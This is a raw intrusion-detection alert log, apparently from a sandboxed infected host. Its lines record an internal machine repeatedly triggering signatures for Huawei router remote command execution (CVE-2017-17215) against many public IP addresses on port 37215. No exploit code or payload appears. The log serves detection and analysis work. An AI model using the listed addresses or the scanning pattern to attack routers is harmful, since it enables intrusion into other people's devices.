                                            06/14/24-10:44:29.011732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942237215192.168.2.14197.48.0.156
                                            06/14/24-10:43:56.229367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.14156.124.154.204
                                            06/14/24-10:43:36.705425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.14156.234.43.13
                                            06/14/24-10:44:02.368945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5208237215192.168.2.14156.177.107.254
                                            06/14/24-10:44:18.779329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3504437215192.168.2.14197.71.236.101
                                            06/14/24-10:43:45.987994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4891837215192.168.2.1441.55.241.87
                                            06/14/24-10:44:10.563777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428637215192.168.2.1441.112.86.64
                                            06/14/24-10:44:08.521650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4122237215192.168.2.14197.210.146.60
                                            06/14/24-10:43:43.969206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654237215192.168.2.1441.65.40.67
                                            06/14/24-10:43:43.943995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383237215192.168.2.14197.204.126.204
                                            06/14/24-10:44:33.133642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863237215192.168.2.1441.56.88.142
                                            06/14/24-10:44:08.501381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5592837215192.168.2.14156.132.133.49
                                            06/14/24-10:44:24.913946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4883637215192.168.2.14156.219.180.27
                                            06/14/24-10:44:02.369329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683037215192.168.2.14156.75.193.112
                                            06/14/24-10:44:10.547368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3598637215192.168.2.1441.26.198.74
                                            06/14/24-10:44:00.326199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355037215192.168.2.14197.50.46.239
                                            06/14/24-10:44:27.001747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397837215192.168.2.14197.102.190.156
                                            06/14/24-10:43:39.789315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5134037215192.168.2.1441.157.26.110
                                            06/14/24-10:44:12.643387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586237215192.168.2.14197.108.139.138
                                            06/14/24-10:43:50.070697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160037215192.168.2.14197.196.45.173
                                            06/14/24-10:44:18.761607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5232837215192.168.2.14197.223.100.164
                                            06/14/24-10:43:34.663553TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801637215192.168.2.14197.72.101.78
                                            06/14/24-10:43:39.811652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810037215192.168.2.14197.140.248.199
                                            06/14/24-10:44:33.133147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974437215192.168.2.14156.57.213.92
                                            06/14/24-10:43:39.808782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747437215192.168.2.14197.228.195.149
                                            06/14/24-10:44:35.181932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949437215192.168.2.1441.143.14.28
                                            06/14/24-10:43:48.029735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629437215192.168.2.14156.167.53.177
                                            06/14/24-10:44:31.051125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268637215192.168.2.14197.168.224.62
                                            06/14/24-10:44:04.411350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291037215192.168.2.14197.75.213.211
                                            06/14/24-10:43:58.276143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951637215192.168.2.14156.217.234.185
                                            06/14/24-10:44:24.932448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4150037215192.168.2.1441.245.51.191
                                            06/14/24-10:44:31.087997TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414237215192.168.2.14156.39.249.44
                                            06/14/24-10:43:50.075140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4245437215192.168.2.14197.131.172.235
                                            06/14/24-10:43:50.071819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083837215192.168.2.14156.163.66.222
                                            06/14/24-10:44:33.149130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321037215192.168.2.14197.80.144.165
                                            06/14/24-10:43:52.146503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3660037215192.168.2.14156.220.38.103
                                            06/14/24-10:43:48.029256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604037215192.168.2.1441.136.168.80
                                            06/14/24-10:44:10.548320TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474637215192.168.2.1441.149.138.214
                                            06/14/24-10:43:56.253038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724637215192.168.2.14197.84.225.249
                                            06/14/24-10:44:27.000256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6026437215192.168.2.14197.8.245.242
                                            06/14/24-10:43:56.250795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5129437215192.168.2.1441.102.144.149
                                            06/14/24-10:44:02.383559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192037215192.168.2.1441.115.4.218
                                            06/14/24-10:44:20.804692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512837215192.168.2.1441.33.65.0
                                            06/14/24-10:44:14.686611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5467037215192.168.2.1441.12.15.229
                                            06/14/24-10:44:12.618666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5778037215192.168.2.1441.57.96.221
                                            06/14/24-10:44:12.616807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3729037215192.168.2.1441.15.233.67
                                            06/14/24-10:44:24.914028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744437215192.168.2.14197.93.206.174
                                            06/14/24-10:43:56.229717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755837215192.168.2.14156.8.240.128
                                            06/14/24-10:44:26.980147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4473637215192.168.2.14156.224.87.126
                                            06/14/24-10:43:52.145616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795637215192.168.2.14197.5.217.22
                                            06/14/24-10:44:16.716153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581437215192.168.2.14197.55.225.26
                                            06/14/24-10:44:22.857840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5921837215192.168.2.14197.81.235.113
                                            06/14/24-10:43:48.045863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5113837215192.168.2.14197.146.21.113
                                            06/14/24-10:44:00.342833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283837215192.168.2.1441.81.207.172
                                            06/14/24-10:44:24.917334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322037215192.168.2.1441.60.23.76
                                            06/14/24-10:43:58.275490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5048837215192.168.2.14197.113.224.204
                                            06/14/24-10:43:54.198926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793837215192.168.2.14156.208.166.113
                                            06/14/24-10:44:29.012865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790237215192.168.2.1441.113.229.47
                                            06/14/24-10:43:45.984650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432037215192.168.2.1441.239.38.16
                                            06/14/24-10:44:12.617653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4699237215192.168.2.14156.58.214.77
                                            06/14/24-10:43:43.942482TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5126637215192.168.2.14156.55.148.73
                                            06/14/24-10:43:48.032201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617437215192.168.2.14197.77.148.172
                                            06/14/24-10:44:14.682950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568237215192.168.2.14156.6.243.6
                                            06/14/24-10:44:18.775951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598037215192.168.2.1441.201.37.15
                                            06/14/24-10:43:52.160255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4576437215192.168.2.14156.187.140.224
                                            06/14/24-10:44:12.643666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677437215192.168.2.14197.45.26.154
                                            06/14/24-10:44:29.022842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599837215192.168.2.14197.236.84.254
                                            06/14/24-10:43:50.074427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6014637215192.168.2.14156.227.111.16
                                            06/14/24-10:44:29.027845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627637215192.168.2.14197.150.163.227
                                            06/14/24-10:43:52.164672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472637215192.168.2.14197.210.132.80
                                            06/14/24-10:43:52.145875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5844437215192.168.2.14156.44.226.203
                                            06/14/24-10:44:10.549564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400437215192.168.2.14156.214.38.38
                                            06/14/24-10:43:56.225826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5909837215192.168.2.1441.173.163.88
                                            06/14/24-10:44:06.472026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3707437215192.168.2.1441.20.179.139
                                            06/14/24-10:43:34.678162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5664837215192.168.2.1441.23.70.120
                                            06/14/24-10:44:00.320870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822437215192.168.2.1441.161.70.90
                                            06/14/24-10:44:14.683750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430237215192.168.2.1441.223.121.125
                                            06/14/24-10:44:06.470308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5238637215192.168.2.1441.93.199.206
                                            06/14/24-10:44:24.915208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5632837215192.168.2.14156.58.247.86
                                            06/14/24-10:44:26.998572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3405437215192.168.2.1441.197.194.197
                                            06/14/24-10:44:31.055414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201837215192.168.2.14197.36.179.89
                                            06/14/24-10:43:36.717397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5246437215192.168.2.1441.213.212.237
                                            06/14/24-10:44:12.643877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875837215192.168.2.14156.102.50.213
                                            06/14/24-10:43:54.200711TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288837215192.168.2.1441.161.69.131
                                            06/14/24-10:43:56.227542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967837215192.168.2.14156.41.140.105
                                            06/14/24-10:44:10.546633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374637215192.168.2.14156.196.127.117
                                            06/14/24-10:44:18.761778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3750437215192.168.2.1441.230.137.134
                                            06/14/24-10:44:16.718979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607037215192.168.2.14156.102.104.231
                                            06/14/24-10:44:29.013667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5085637215192.168.2.14156.246.216.88
                                            06/14/24-10:44:14.688376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4049037215192.168.2.1441.114.209.204
                                            06/14/24-10:43:56.225734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5103237215192.168.2.14156.199.212.245
                                            06/14/24-10:44:16.715987TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410037215192.168.2.14197.102.158.126
                                            06/14/24-10:44:18.780013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5983237215192.168.2.14197.193.127.253
                                            06/14/24-10:44:24.916548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446637215192.168.2.14156.63.181.102
                                            06/14/24-10:44:27.001695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4175237215192.168.2.1441.184.94.185
                                            06/14/24-10:44:29.012835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209637215192.168.2.14197.32.145.31
                                            06/14/24-10:43:48.030122TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5204837215192.168.2.14156.139.102.229
                                            06/14/24-10:44:08.504467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3499637215192.168.2.14197.13.80.17
                                            06/14/24-10:43:58.289291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193037215192.168.2.1441.56.14.1
                                            06/14/24-10:44:22.861229TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498237215192.168.2.1441.8.124.93
                                            06/14/24-10:44:00.321886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623437215192.168.2.14156.201.190.158
                                            06/14/24-10:44:08.520730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169037215192.168.2.14156.223.187.67
                                            06/14/24-10:44:12.614514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3382837215192.168.2.14156.232.150.169
                                            06/14/24-10:44:18.778239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5352837215192.168.2.14156.96.111.46
                                            06/14/24-10:44:12.616699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605237215192.168.2.14197.219.59.177
                                            06/14/24-10:44:29.012536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946237215192.168.2.14156.11.231.73
                                            06/14/24-10:43:36.703677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439637215192.168.2.1441.247.182.165
                                            06/14/24-10:44:22.882774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707237215192.168.2.14197.4.74.17
                                            06/14/24-10:44:12.614009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713837215192.168.2.14197.71.192.161
                                            06/14/24-10:44:33.133340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727637215192.168.2.14156.33.221.192
                                            06/14/24-10:44:31.055878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308837215192.168.2.14197.211.19.84
                                            06/14/24-10:44:16.733563TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140837215192.168.2.14156.167.82.46
                                            06/14/24-10:43:43.942415TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4197037215192.168.2.14156.218.70.230
                                            06/14/24-10:43:41.848536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3814437215192.168.2.14156.80.22.52
                                            06/14/24-10:44:18.761513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234437215192.168.2.14197.183.29.244
                                            06/14/24-10:43:48.021821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5659637215192.168.2.14156.232.9.31
                                            06/14/24-10:44:24.915815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6000437215192.168.2.14156.61.46.181
                                            06/14/24-10:44:26.977372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537437215192.168.2.14197.159.178.152
                                            06/14/24-10:43:39.790640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934437215192.168.2.14156.143.59.57
                                            06/14/24-10:44:00.323541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4621637215192.168.2.14197.193.100.115
                                            06/14/24-10:44:12.644391TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4347637215192.168.2.14156.246.207.49
                                            06/14/24-10:44:22.882246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372037215192.168.2.14156.26.35.74
                                            06/14/24-10:44:24.947315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6065037215192.168.2.1441.112.94.89
                                            06/14/24-10:44:24.917151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092237215192.168.2.14156.156.82.106
                                            06/14/24-10:43:45.966358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4183037215192.168.2.14156.213.121.122
                                            06/14/24-10:44:18.777260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284037215192.168.2.14156.167.130.218
                                            06/14/24-10:43:39.813351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4387837215192.168.2.1441.193.116.162
                                            06/14/24-10:44:08.505002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195637215192.168.2.14156.86.224.30
                                            06/14/24-10:44:16.734668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5960237215192.168.2.1441.59.157.194
                                            06/14/24-10:44:02.368237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486037215192.168.2.14156.50.12.194
                                            06/14/24-10:43:52.163454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3813637215192.168.2.14156.227.25.183
                                            06/14/24-10:43:58.277106TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4230437215192.168.2.14156.70.98.22
                                            06/14/24-10:44:04.412368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458037215192.168.2.1441.249.75.18
                                            06/14/24-10:44:22.879661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835837215192.168.2.14156.192.200.254
                                            06/14/24-10:43:37.763305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3942437215192.168.2.14197.193.31.30
                                            06/14/24-10:44:35.181888TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5863237215192.168.2.14156.255.115.255
                                            06/14/24-10:43:45.985056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294837215192.168.2.14197.104.176.23
                                            06/14/24-10:43:52.143270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024037215192.168.2.14156.128.215.66
                                            06/14/24-10:44:10.564939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740237215192.168.2.14156.158.17.164
                                            06/14/24-10:44:35.178109TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062237215192.168.2.14156.10.151.155
                                            06/14/24-10:44:18.779871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155237215192.168.2.14156.135.197.219
                                            06/14/24-10:44:26.979759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163037215192.168.2.14156.205.214.239
                                            06/14/24-10:43:34.679159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019437215192.168.2.14197.173.194.201
                                            06/14/24-10:44:08.503821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4610437215192.168.2.14156.132.126.171
                                            06/14/24-10:44:00.320972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276637215192.168.2.14156.159.116.141
                                            06/14/24-10:44:04.424417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894037215192.168.2.1441.31.62.107
                                            06/14/24-10:43:37.762600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5384837215192.168.2.1441.125.41.46
                                            06/14/24-10:44:02.385691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3814237215192.168.2.14156.112.19.190
                                            06/14/24-10:44:33.132350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841237215192.168.2.1441.88.193.223
                                            06/14/24-10:44:12.646156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006437215192.168.2.14197.219.129.131
                                            06/14/24-10:44:00.325616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708837215192.168.2.1441.47.81.51
                                            06/14/24-10:44:06.451462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4482637215192.168.2.14197.54.224.185
                                            06/14/24-10:44:20.829107TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4079637215192.168.2.14197.85.102.183
                                            06/14/24-10:43:48.028854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411837215192.168.2.14197.174.60.66
                                            06/14/24-10:44:04.411319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4319437215192.168.2.14156.55.59.9
                                            06/14/24-10:44:02.366992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586237215192.168.2.14156.211.92.239
                                            06/14/24-10:43:36.718612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283037215192.168.2.1441.101.141.48
                                            06/14/24-10:43:34.675404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413837215192.168.2.1441.16.196.29
                                            06/14/24-10:44:12.624880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400037215192.168.2.14197.139.153.20
                                            06/14/24-10:44:02.383850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541437215192.168.2.14197.209.93.226
                                            06/14/24-10:43:34.660692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4622437215192.168.2.14197.145.0.42
                                            06/14/24-10:43:48.017349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3474637215192.168.2.14156.252.140.2
                                            06/14/24-10:44:02.367489TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399637215192.168.2.1441.131.199.29
                                            06/14/24-10:44:12.616147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408237215192.168.2.1441.147.179.15
                                            06/14/24-10:44:14.667118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3390837215192.168.2.1441.168.225.228
                                            06/14/24-10:44:06.451860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980037215192.168.2.14156.36.5.170
                                            06/14/24-10:44:22.857683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998837215192.168.2.14197.178.172.89
                                            06/14/24-10:44:08.517398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3287237215192.168.2.1441.112.44.229
                                            06/14/24-10:44:10.569321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827437215192.168.2.14156.60.109.235
                                            06/14/24-10:44:24.917827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5154837215192.168.2.1441.172.63.76
                                            06/14/24-10:44:29.013474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379437215192.168.2.1441.226.172.85
                                            06/14/24-10:44:00.321514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5314637215192.168.2.14197.31.238.197
                                            06/14/24-10:43:45.965853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4557837215192.168.2.14156.70.153.146
                                            06/14/24-10:43:52.160684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5950837215192.168.2.14156.230.168.99
                                            06/14/24-10:44:02.367083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081437215192.168.2.14197.116.166.6
                                            06/14/24-10:43:50.070798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5688037215192.168.2.1441.14.147.23
                                            06/14/24-10:44:00.325448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.14197.30.48.151
                                            06/14/24-10:44:10.564635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255837215192.168.2.1441.154.45.161
                                            06/14/24-10:44:20.828593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540237215192.168.2.14197.60.181.94
                                            06/14/24-10:44:24.943765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583037215192.168.2.14156.40.24.119
                                            06/14/24-10:44:31.054791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283037215192.168.2.14197.136.132.84
                                            06/14/24-10:43:43.943708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419037215192.168.2.1441.37.190.182
                                            06/14/24-10:44:02.384470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402437215192.168.2.1441.111.134.21
                                            06/14/24-10:43:41.849012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4385237215192.168.2.1441.149.178.213
                                            06/14/24-10:44:00.322805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5059037215192.168.2.14156.199.144.65
                                            06/14/24-10:44:31.053763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5343437215192.168.2.14197.156.33.239
                                            06/14/24-10:44:20.831251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184037215192.168.2.14197.248.135.248
                                            06/14/24-10:44:08.501697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3970037215192.168.2.14156.250.155.20
